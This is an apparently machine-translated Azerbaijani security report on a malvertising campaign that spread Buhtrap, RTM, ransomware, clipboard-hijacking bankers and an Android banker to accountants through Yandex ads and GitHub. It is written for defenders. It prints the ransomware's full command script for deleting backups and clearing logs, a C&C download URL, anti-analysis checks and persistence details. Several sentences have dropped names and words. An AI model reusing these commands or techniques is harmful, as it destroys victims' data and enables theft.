Mühasibləri kiberhücumda hədəfləmək üçün onların onlayn axtardıqları iş sənədlərindən istifadə edə bilərsiniz. Bu, təxminən bir kiberqrupun son bir neçə ay ərzində məlum arxa qapıları yayaraq etdiyi şeydir. и , həmçinin kriptovalyutaların oğurlanması üçün şifrələyicilər və proqram təminatı. Hədəflərin əksəriyyəti Rusiyada yerləşir. Hücum Yandex.Direct-də zərərli reklamların yerləşdirilməsi ilə həyata keçirilib. Potensial qurbanlar veb-sayta yönləndirilib, onlardan sənəd şablonu kimi gizlədilmiş zərərli faylı yükləmək istənilib. Bizim xəbərdarlığımızdan sonra Yandex zərərli reklamı sildi.
Buhtrap-ın mənbə kodu keçmişdə internetə sızdırılıb ki, hər kəs ondan istifadə edə bilsin. RTM kodunun mövcudluğu ilə bağlı heç bir məlumatımız yoxdur.
Bu yazıda sizə hücum edənlərin Yandex.Direct-dən istifadə edərək zərərli proqram təminatını necə yaydığını və onu GitHub-da yerləşdirdiyini izah edəcəyik. Yazı zərərli proqramın texniki təhlili ilə yekunlaşacaq.
Buhtrap və RTM yenidən işə başlayıb
Yayılma mexanizmi və qurbanlar
Qurbanlara çatdırılan müxtəlif faydalı yüklər ümumi yayılma mexanizmini bölüşür. Təcavüzkarlar tərəfindən yaradılan bütün zərərli fayllar iki fərqli GitHub repozitoriyasına yerləşdirilib.
Tipik olaraq, repozitoriyada tez-tez dəyişən bir yüklənə bilən zərərli fayl var idi. GitHub sizə repozitoriyada edilən dəyişikliklərin tarixçəsinə baxmağa imkan verdiyi üçün biz müəyyən müddət ərzində hansı zərərli proqramın yayıldığını görə bilərik. Qurbanı zərərli faylı yükləməyə inandırmaq üçün yuxarıdakı şəkildə göstərilən blanki-shabloni24[.]ru saytından istifadə edilmişdir.
Saytın dizaynı və zərərli faylların bütün adları vahid konsepsiyaya uyğundur - formalar, şablonlar, müqavilələr, nümunələr və s. Buhtrap və RTM proqramlarının keçmişdə mühasiblərə qarşı hücumlarda artıq istifadə edildiyini nəzərə alsaq, biz güman etdik ki, yeni kampaniyada strategiya eynidir. Yeganə sual, qurbanın təcavüzkarların saytına necə daxil olmasıdır.
İnfeksiya
Bu sayta daxil olan ən azı bir neçə potensial qurbanı zərərli reklam cəlb etdi. Aşağıda nümunə URL-dir:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Linkdən də göründüyü kimi, banner legitim mühasibat uçotu forumunda bb.f2[.]kz yerləşdirilib. Qeyd etmək vacibdir ki, bannerlər müxtəlif saytlarda peyda olub, hamısının eyni kampaniya identifikatoru (blanki_rsya) olub və əksəriyyəti mühasibatlıq və ya hüquqi yardım xidmətləri ilə bağlı olub. URL göstərir ki, potensial qurban “qaimə-faktura formasını endir” sorğusundan istifadə edib ki, bu da hədəflənmiş hücumlarla bağlı fərziyyəmizi dəstəkləyir. Aşağıda bannerlərin göründüyü saytlar və müvafiq axtarış sorğuları verilmişdir.
- faktura formasını yükləyin – bb.f2[.]kz
- müqavilə nümunəsi - Ipopen[.]ru
- ərizə şikayəti nümunəsi - 77metrov[.]ru
- müqavilə forması - blank-dogovor-kupli-prodazhi[.]ru
- məhkəmə ərizəsi nümunəsi - zen.yandex[.]ru
- şikayət nümunəsi - yurday[.]ru
- nümunə müqavilə formaları – Regforum[.]ru
- müqavilə forması – assistentus[.]ru
- nümunə mənzil müqaviləsi – napravah[.]com
- hüquqi müqavilələrin nümunələri - avito[.]ru
blanki-shabloni24[.]ru saytı sadə vizual qiymətləndirmədən keçmək üçün konfiqurasiya edilmiş ola bilər. Tipik olaraq, GitHub-a keçidi olan peşəkar görünüşlü sayta işarə edən reklam, açıq-aydın pis bir şey kimi görünmür. Bundan əlavə, təcavüzkarlar zərərli faylları anbara yalnız məhdud müddətə, ehtimal ki, kampaniya zamanı yükləyiblər. Çox vaxt GitHub anbarında boş zip arxivi və ya boş EXE faylı var idi. Beləliklə, təcavüzkarlar Yandex.Direct vasitəsilə xüsusi axtarış sorğularına cavab olaraq gələn mühasiblər tərəfindən çox güman ki, ziyarət edilən saytlarda reklam yaya bilərdilər.
Sonra, bu şəkildə paylanmış müxtəlif faydalı yüklərə baxaq.
Yük Təhlili
Paylanma xronologiyası
Zərərli kampaniya 2018-ci ilin oktyabr ayının sonunda başladı və yazı hazırlanarkən aktivdir. Bütün repozitoriya GitHub-da ictimaiyyətə açıq olduğundan, biz altı müxtəlif zərərli proqram ailəsinin paylanmasının dəqiq qrafikini tərtib etdik (aşağıdakı şəklə baxın). Git tarixçəsi ilə müqayisə etmək üçün ESET telemetriyası ilə ölçülən banner linkinin nə vaxt aşkar edildiyini göstərən bir xətt əlavə etdik. Gördüyünüz kimi, bu, GitHub-da faydalı yükün mövcudluğu ilə yaxşı əlaqələndirilir. Fevralın sonundakı uyğunsuzluğu onunla izah etmək olar ki, bizdə dəyişiklik tarixinin bir hissəsi yox idi, çünki depo GitHub-dan tam şəkildə əldə edilməmişdən əvvəl silinib.
Şəkil 1. Zərərli proqramların yayılmasının xronologiyası.
Kod imzalama sertifikatları
Kampaniya bir neçə sertifikatdan istifadə etdi. Bəziləri birdən çox zərərli proqram ailəsi tərəfindən imzalanmışdır ki, bu da müxtəlif nümunələrin eyni kampaniyaya aid olduğunu göstərir. Şəxsi açarın mövcudluğuna baxmayaraq, operatorlar sistematik olaraq binar sənədləri imzalamadılar və bütün nümunələr üçün açardan istifadə etmədilər. 2019-cu ilin fevral ayının sonlarında təcavüzkarlar şəxsi açarı olmayan Google-a məxsus sertifikatdan istifadə edərək etibarsız imzalar yaratmağa başladılar.
Kampaniyada iştirak edən bütün sertifikatlar və onların imzaladığı zərərli proqram ailələri aşağıdakı cədvəldə verilmişdir.
Biz həmçinin digər zərərli proqram ailələri ilə əlaqə yaratmaq üçün bu kod imzalama sertifikatlarından istifadə etdik. Əksər sertifikatlar üçün GitHub repozitoriyası vasitəsilə yayılmayan nümunələri tapmadıq. Bununla belə, TOV “MARİYA” sertifikatı botnetə aid zərərli proqramları imzalamaq üçün istifadə edilib , reklam proqramları və madenciler. Bu zərərli proqramın bu kampaniya ilə əlaqəli olması ehtimalı azdır. Çox güman ki, sertifikat darknet-də alınıb.
Win32/Filecoder.Buhtrap
Diqqətimizi çəkən ilk komponent yeni kəşf edilmiş Win32/Filecoder.Buhtrap oldu. Bu bəzən paketlənmiş Delphi ikili faylıdır. Əsasən 2019-cu ilin fevral-mart aylarında paylanmışdır. O, ransomware proqramına uyğun davranır - o, yerli diskləri və şəbəkə qovluqlarını axtarır və tapdığı faylları şifrələyir. Şifrələmə açarlarını göndərmək üçün serverlə əlaqə saxlamadığı üçün onun pozulması üçün İnternet bağlantısına ehtiyac yoxdur. Bunun əvəzinə, o, fidyə mesajının sonuna “token” əlavə edir və operatorlarla əlaqə saxlamaq üçün e-poçt və ya Bitmessage-dən istifadə etməyi təklif edir.
Mümkün qədər çox həssas resursu şifrələmək üçün Filecoder.Buhtrap şifrələməyə mane ola biləcək dəyərli məlumatları ehtiva edən açıq fayl işləyiciləri ola biləcək əsas proqram təminatını bağlamaq üçün nəzərdə tutulmuş bir ip işlədir. Hədəf proseslər əsasən verilənlər bazası idarəetmə sistemləridir (DBMS). Bundan əlavə, Filecoder.Buhtrap məlumatların bərpasını çətinləşdirmək üçün log fayllarını və ehtiyat nüsxələrini silir. Bunu etmək üçün aşağıdakı toplu skripti işə salın.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap vebsayt ziyarətçiləri haqqında məlumat toplamaq üçün nəzərdə tutulmuş qanuni onlayn IP Logger xidmətindən istifadə edir. Bu, komanda xəttinin məsuliyyəti olan ransomware qurbanlarını izləmək üçün nəzərdə tutulub:
mshta.exe "javascript:document.write('');"
Şifrələmə üçün fayllar üç istisna siyahısına uyğun gəlmirsə seçilir. Birincisi, aşağıdakı uzantıları olan fayllar şifrələnmir: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys və .bat. İkincisi, tam yolu aşağıdakı siyahıdan kataloq sətirlərini ehtiva edən bütün fayllar xaric edilir.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
Üçüncüsü, müəyyən fayl adları da şifrələmədən çıxarılıb, onların arasında fidyə mesajının fayl adı da var. Siyahı aşağıda təqdim olunur. Aydındır ki, bütün bu istisnalar maşının işlək vəziyyətdə saxlanması üçün nəzərdə tutulmuşdur, lakin minimum yol yararlılığı ilə.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Fayl şifrələmə sxemi
Zərərli proqram icra edildikdən sonra 512 bitlik RSA açar cütü yaradır. Şəxsi eksponent (d) və modul (n) daha sonra sərt kodlu 2048 bitlik açıq açarla (ictimai eksponent və modul), zlib-paketlə və base64 kodlu ilə şifrələnir. Buna cavabdeh olan kod Şəkil 2-də göstərilmişdir.
Şəkil 2. 512-bit RSA açar cütünün yaradılması prosesinin Hex-Rays dekompilyasiyasının nəticəsi.
Aşağıda fidyə mesajına əlavə edilmiş bir işarə olan yaradılan şəxsi açarı olan düz mətn nümunəsidir.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
Təcavüzkarların açıq açarı aşağıda verilmişdir.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
Fayllar 128 bitlik açarla AES-256-CBC istifadə edərək şifrələnir. Hər bir şifrələnmiş fayl üçün yeni açar və yeni başlanğıc vektoru yaradılır. Əsas məlumat şifrələnmiş faylın sonuna əlavə olunur. Şifrələnmiş faylın formatını nəzərdən keçirək.
Şifrələnmiş fayllar aşağıdakı başlığa malikdir:
VEGA sehrli dəyərinin əlavə edilməsi ilə mənbə fayl məlumatları ilk 0x5000 bayta şifrələnir. Bütün deşifrə məlumatları aşağıdakı strukturu olan fayla əlavə olunur:
- Fayl ölçüsü markerində faylın ölçüsünün 0x5000 baytdan böyük olub olmadığını göstərən işarə var
— AES açar blob = ZlibCompress(RSAEncrypt(AES açarı + IV, yaradılan RSA açar cütünün açıq açarı))
- RSA açar blob = ZlibCompress(RSAEncrypt (yaratılmış RSA şəxsi açarı, sərt kodlu RSA açıq açarı))
Win32/ClipBanker
Win32/ClipBanker 2018-ci ilin oktyabr ayının sonundan dekabrın əvvəlinə qədər fasilələrlə paylanmış komponentdir. Onun rolu panonun məzmununu izləməkdir, kriptovalyuta cüzdanlarının ünvanlarını axtarır. Hədəf pul kisəsinin ünvanını təyin etdikdən sonra ClipBanker onu operatorlara aid olduğu güman edilən ünvanla əvəz edir. Tədqiq etdiyimiz nümunələr nə qutuda, nə də qarışıq idi. Davranışı maskalamaq üçün istifadə olunan yeganə mexanizm simli şifrələmədir. Operator pul kisəsinin ünvanları RC4 istifadə edərək şifrələnir. Hədəf kriptovalyutalar Bitcoin, Bitcoin cash, Dogecoin, Ethereum və Ripple-dir.
Zərərli proqramın təcavüzkarların Bitcoin cüzdanlarına yayıldığı dövrdə VTS-ə kiçik bir məbləğ göndərilib ki, bu da kampaniyanın uğurunu şübhə altına alır. Bundan əlavə, bu əməliyyatların ümumiyyətlə ClipBanker ilə əlaqəli olduğuna dair heç bir sübut yoxdur.
Win32/RTM
Win32/RTM komponenti 2019-cu ilin mart ayının əvvəlində bir neçə gün ərzində paylandı. RTM uzaqdan bankçılıq sistemlərinə yönəlmiş Delphi-də yazılmış troyan bankiridir. 2017-ci ildə ESET tədqiqatçıları nəşr etdi bu proqramın təsviri hələ də aktualdır. 2019-cu ilin yanvar ayında Palo Alto Networks də buraxıldı .
Buhtrap Yükləyicisi
Bir müddətdir ki, GitHub-da əvvəlki Buhtrap alətlərinə bənzəməyən bir yükləyici mövcud idi. çevrilir https://94.100.18[.]67/RSS.php?<some_id> növbəti mərhələni əldə etmək və onu birbaşa yaddaşa yükləmək üçün. İkinci mərhələ kodunun iki davranışını ayırd edə bilərik. Birinci URL-də RSS.php birbaşa Buhtrap arxa qapısından keçdi - bu arxa qapı mənbə kodu sızdıqdan sonra mövcud olana çox bənzəyir.
Maraqlıdır ki, Buhtrap arxa qapısı ilə bir neçə kampaniya görürük və onların fərqli operatorlar tərəfindən idarə edildiyi iddia edilir. Bu vəziyyətdə əsas fərq, arxa qapının birbaşa yaddaşa yüklənməsi və haqqında danışdığımız DLL yerləşdirmə prosesi ilə adi sxemdən istifadə etməməsidir. . Bundan əlavə, operatorlar şəbəkə trafikini C&C serverinə şifrələmək üçün istifadə edilən RC4 açarını dəyişdirdilər. Gördüyümüz kampaniyaların əksəriyyətində operatorlar bu açarı dəyişməyə can atmadılar.
İkinci, daha mürəkkəb davranış RSS.php URL-nin başqa yükləyiciyə ötürülməsi idi. O, dinamik idxal cədvəlinin yenidən qurulması kimi bəzi çaşqınlıqları həyata keçirdi. Yükləyicinin məqsədi C&C serveri ilə əlaqə saxlamaqdır [.]com/api/F27F84EDA4D13B15/2, qeydləri göndərin və cavab gözləyin. O, cavabı blob kimi emal edir, yaddaşa yükləyir və icra edir. Bu yükləyicini yerinə yetirərkən gördüyümüz faydalı yük eyni Buhtrap arxa qapısı idi, lakin başqa komponentlər də ola bilər.
Android/Spy.Banker
Maraqlıdır ki, GitHub deposunda Android üçün komponent də tapılıb. O, cəmi bir gün - 1-ci il noyabrın 2018-də əsas filialda olub. GitHub-da yerləşdirilməkdən başqa, ESET telemetriyası bu zərərli proqramın yayılmasına dair heç bir sübut tapmır.
Komponent Android Tətbiq Paketi (APK) kimi yerləşdirilib. Çox qarışıqdır. Zərərli davranış APK-da yerləşən şifrələnmiş JAR-da gizlənir. Bu açardan istifadə edərək RC4 ilə şifrələnir:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
Eyni açar və alqoritm sətirləri şifrələmək üçün istifadə olunur. JAR-da yerləşir APK_ROOT + image/files. Faylın ilk 4 baytı uzunluq sahəsindən dərhal sonra başlayan şifrələnmiş JAR-ın uzunluğunu ehtiva edir.
Faylın şifrəsini açdıqdan sonra onun Anubis olduğunu aşkar etdik - əvvəllər Android üçün bankir. Zərərli proqram aşağıdakı xüsusiyyətlərə malikdir:
- mikrofon qeydi
- ekran görüntüləri çəkmək
- GPS koordinatlarının alınması
- keylogger
- cihaz məlumatlarının şifrələnməsi və fidyə tələbi
- spam göndərmək
Maraqlıdır ki, bankir başqa bir C&C server əldə etmək üçün Twitter-dən ehtiyat kommunikasiya kanalı kimi istifadə edib. Təhlil etdiyimiz nümunə @JonesTrader hesabından istifadə etdi, lakin təhlil zamanı o, artıq bloklanmışdı.
Bankir Android cihazında hədəf proqramların siyahısını ehtiva edir. Bu, Sophos tədqiqatında əldə edilən siyahıdan daha uzundur. Siyahıya bir çox bank proqramları, Amazon və eBay kimi onlayn alış-veriş proqramları və kriptovalyuta xidmətləri daxildir.
MSIL/ClipBanker.IH
Bu kampaniyanın bir hissəsi kimi paylanmış sonuncu komponent 2019-cu ilin martında ortaya çıxan .NET Windows icraedici proqramı idi. Tədqiq olunan versiyaların əksəriyyəti ConfuserEx v1.0.0 ilə paketlənmişdir. ClipBanker kimi, bu komponent də buferdən istifadə edir. Onun məqsədi geniş çeşiddə kriptovalyutalar, həmçinin Steam-də təkliflərdir. Bundan əlavə, o, Bitcoin şəxsi WIF açarını oğurlamaq üçün IP Logger xidmətindən istifadə edir.
Mühafizə mexanizmləri
ConfuserEx-in sazlama, dempinq və saxtalaşdırmanın qarşısını almaqda təmin etdiyi üstünlüklərə əlavə olaraq, komponent antivirus məhsullarını və virtual maşınları aşkar etmək qabiliyyətini ehtiva edir.
Virtual maşında işlədiyini yoxlamaq üçün zərərli proqram BIOS məlumatını tələb etmək üçün daxili Windows WMI komanda xəttindən (WMIC) istifadə edir, yəni:
wmic bios
Sonra proqram əmr çıxışını təhlil edir və açar sözləri axtarır: VBOX, VirtualBox, XEN, qemu, bochs, VM.
Antivirus məhsullarını aşkar etmək üçün zərərli proqram istifadə edərək Windows Təhlükəsizlik Mərkəzinə Windows İdarəetmə Alətləri (WMI) sorğusu göndərir ManagementObjectSearcher API aşağıda göstərildiyi kimi. Base64-dən şifrəni açdıqdan sonra zəng belə görünür:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Şəkil 3. Antivirus məhsullarının identifikasiyası prosesi.
Bundan əlavə, zərərli proqram olub olmadığını yoxlayır , mübadilə buferi hücumlarından qorunmaq üçün bir alətdir və əgər işləyirsə, bu prosesdəki bütün mövzuları dayandırır və bununla da mühafizəni söndürür.
Əzmkarlıq
Tədqiq etdiyimiz zərərli proqram versiyası özünü kopyalayır %APPDATA%googleupdater.exe və google kataloqu üçün “gizli” atributunu təyin edir. Sonra dəyəri dəyişir SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell Windows reyestrində və yolu əlavə edir updater.exe. Beləliklə, istifadəçi hər dəfə daxil olduqda zərərli proqram icra ediləcək.
Zərərli davranış
ClipBanker kimi, zərərli proqram mübadilə buferinin məzmununu izləyir və kriptovalyuta pul kisəsinin ünvanlarını axtarır və tapıldıqda onu operatorun ünvanlarından biri ilə əvəz edir. Aşağıda kodda tapılanlara əsaslanan hədəf ünvanların siyahısı verilmişdir.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Hər bir ünvan növü üçün müvafiq normal ifadə var. Buferdə müəyyən etmək üçün istifadə edilən müntəzəm ifadədən göründüyü kimi STEAM_URL dəyəri Steam sisteminə hücum etmək üçün istifadə olunur:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Eksfiltrasiya kanalı
Buferdəki ünvanları əvəz etməklə yanaşı, zərərli proqram Bitcoin, Bitcoin Core və Electrum Bitcoin pul kisələrinin şəxsi WIF açarlarını hədəfləyir. Proqram WIF özəl açarını əldə etmək üçün eksfiltrasiya kanalı kimi plogger.org-dan istifadə edir. Bunun üçün operatorlar aşağıda göstərildiyi kimi User-Agent HTTP başlığına şəxsi açar məlumatlarını əlavə edirlər.
Şəkil 4. Çıxış məlumatları ilə IP Logger konsolu.
Operatorlar pul kisələrini çıxarmaq üçün iplogger.org-dan istifadə etməyiblər. Sahədə 255 simvol limitinə görə yəqin ki, fərqli üsula əl atıblar User-AgentIP Logger veb interfeysində göstərilir. Tədqiq etdiyimiz nümunələrdə digər çıxış serveri mühit dəyişənində saxlanılırdı DiscordWebHook. Təəccüblüdür ki, bu mühit dəyişəni kodun heç bir yerində təyin edilməyib. Bu, zərərli proqramın hələ də inkişaf mərhələsində olduğunu və dəyişənin operatorun sınaq maşınına təyin edildiyini göstərir.
Proqramın inkişaf mərhələsində olduğunu göstərən başqa bir əlamət var. Binar fayla iki iplogger.org URL-i daxildir və hər ikisi məlumatların sızması zamanı sorğulanır. Bu URL-lərdən birinə sorğuda Referer sahəsindəki dəyərdən əvvəl “DEV /” yazılır. Biz həmçinin ConfuserEx istifadə edərək qablaşdırılmamış versiya tapdıq, bu URL üçün alıcı DevFeedbackUrl adlanır. Ətraf mühit dəyişəninin adına əsaslanaraq, operatorların kriptovalyuta pul kisələrini oğurlamaq üçün qanuni Discord xidmətindən və onun veb-ələ keçirmə sistemindən istifadə etməyi planlaşdırdığına inanırıq.
Nəticə
Bu kampaniya kiberhücumlarda qanuni reklam xidmətlərindən istifadə nümunəsidir. Sxem Rusiya təşkilatlarını hədəf alır, lakin qeyri-rus xidmətlərindən istifadə edərək belə bir hücum görsək təəccüblənmərik. Kompromisdən qaçmaq üçün istifadəçilər yüklədikləri proqram təminatının mənbəyinin reputasiyasına arxayın olmalıdırlar.
Kompromis göstəricilərinin və MITER ATT&CK atributlarının tam siyahısı burada mövcuddur .
Mənbə: www.habr.com